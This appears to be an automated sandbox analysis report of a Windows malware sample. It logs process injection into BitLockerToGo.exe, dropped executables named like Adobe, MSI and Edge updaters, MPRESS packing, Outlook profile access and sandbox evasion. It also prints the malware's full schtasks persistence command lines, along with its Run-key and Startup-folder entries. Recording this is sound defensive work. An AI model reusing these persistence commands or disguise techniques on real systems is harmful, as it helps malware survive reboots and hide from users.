Source: unknown Process created: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe "C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe "C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe "C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 LG" /sc ONLOGON /rl HIGHEST Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process created: C:\Users\user\AppData\Local\Temp\spanCPXDj512V5iG\KSExO5GhJ2KIj6jiDKtz.exe "C:\Users\user\AppData\Local\Temp\spanCPXDj512V5iG\KSExO5GhJ2KIj6jiDKtz.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\spanCPXDj512V5iG\KSExO5GhJ2KIj6jiDKtz.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe" Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: dxcore.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: d2d1.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\spanCPXDj512V5iG\KSExO5GhJ2KIj6jiDKtz.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\spanCPXDj512V5iG\KSExO5GhJ2KIj6jiDKtz.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\spanCPXDj512V5iG\KSExO5GhJ2KIj6jiDKtz.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\spanCPXDj512V5iG\KSExO5GhJ2KIj6jiDKtz.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Section loaded: wldp.dll Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Section loaded: apphelp.dll Jump to behavior
Source: EdgeMS2.lnk.3.dr LNK file: ..\..\..\..\..\..\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: file.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: file.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: file.exe Static file information: File size 12249088 > 1048576
Source: file.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x49e000
Source: file.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x698e00
Source: file.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: BitLockerToGo.pdb source: file.exe, 00000000.00000003.2239999857.0000019161670000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2264369355.000000C000728000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2266023505.000000C0017B6000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2266023505.000000C0017F0000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.4555474593.000000000312F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: BitLockerToGo.pdbGCTL source: file.exe, 00000000.00000003.2239999857.0000019161670000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2264369355.000000C000728000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2266023505.000000C0017B6000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2266023505.000000C0017F0000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.4555474593.000000000312F000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Unpacked PE file: 9.2.MSIUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\spanCPXDj512V5iG\KSExO5GhJ2KIj6jiDKtz.exe Unpacked PE file: 10.2.KSExO5GhJ2KIj6jiDKtz.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Unpacked PE file: 11.2.MSIUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Unpacked PE file: 15.2.oobeldr.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Unpacked PE file: 20.2.AdobeUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Unpacked PE file: 22.2.AdobeUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Unpacked PE file: 23.2.EdgeMS2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Contains functionality to dynamically determine API calls
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ECF280 VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,LoadLibraryA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject, 3_2_02ECF280
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .MPRESS2
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name: .xdata
Source: l2[1].exe.3.dr Static PE information: section name: .MPRESS1
Source: l2[1].exe.3.dr Static PE information: section name: .MPRESS2
Source: KSExO5GhJ2KIj6jiDKtz.exe.3.dr Static PE information: section name: .MPRESS1
Source: KSExO5GhJ2KIj6jiDKtz.exe.3.dr Static PE information: section name: .MPRESS2
Source: AdobeUpdaterV2.exe.3.dr Static PE information: section name: .MPRESS1
Source: AdobeUpdaterV2.exe.3.dr Static PE information: section name: .MPRESS2
Source: MSIUpdaterV2.exe.3.dr Static PE information: section name: .MPRESS1
Source: MSIUpdaterV2.exe.3.dr Static PE information: section name: .MPRESS2
Source: EdgeMS2.exe.3.dr Static PE information: section name: .MPRESS1
Source: EdgeMS2.exe.3.dr Static PE information: section name: .MPRESS2
Source: oobeldr.exe.10.dr Static PE information: section name: .MPRESS1
Source: oobeldr.exe.10.dr Static PE information: section name: .MPRESS2
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F262E1 push esp; ret 3_2_02F262E3
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F44062 push ss; ret 3_2_02F44064
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F40482 push ss; ret 3_2_02F40484
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E2CFDB push cs; iretd 3_2_02E2D025
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E33F59 push ecx; ret 3_2_02E33F6C
Drops PE files
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\l2[1].exe Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\Users\user\AppData\Local\Temp\spanCPXDj512V5iG\KSExO5GhJ2KIj6jiDKtz.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\spanCPXDj512V5iG\KSExO5GhJ2KIj6jiDKtz.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2.lnk Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2.lnk Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EEE170 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 3_2_02EEE170
Source: C:\Users\user\Desktop\file.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Contains functionality to implement multi-threaded time evasion
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_07EBC230 CreateThread,Sleep, call eax 3_2_07EBC230
Found API chain indicative of sandbox detection
